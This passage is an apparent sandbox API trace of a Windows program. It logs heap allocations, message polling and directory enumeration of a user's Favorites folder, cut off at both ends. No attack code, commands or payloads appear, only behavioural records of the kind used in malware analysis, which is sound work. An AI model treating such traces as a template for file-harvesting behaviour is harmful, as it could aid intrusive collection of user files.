Flags=0x0, Size=0x10) returned 0x76b480 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.197] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6bb0c0 [0074.198] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.198] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.198] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.198] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.203] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.203] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e1e8 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.203] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.203] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0074.204] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.204] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.204] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0074.205] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x6bb0c0 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb168 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb168 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.206] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.206] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.206] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.206] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b858 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.207] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.207] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0074.207] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x6bb0c0 [0074.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb178 [0074.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb178 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x170) returned 0x6bb178 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb178 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.208] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.208] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.208] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.209] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.209] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.209] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.209] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, 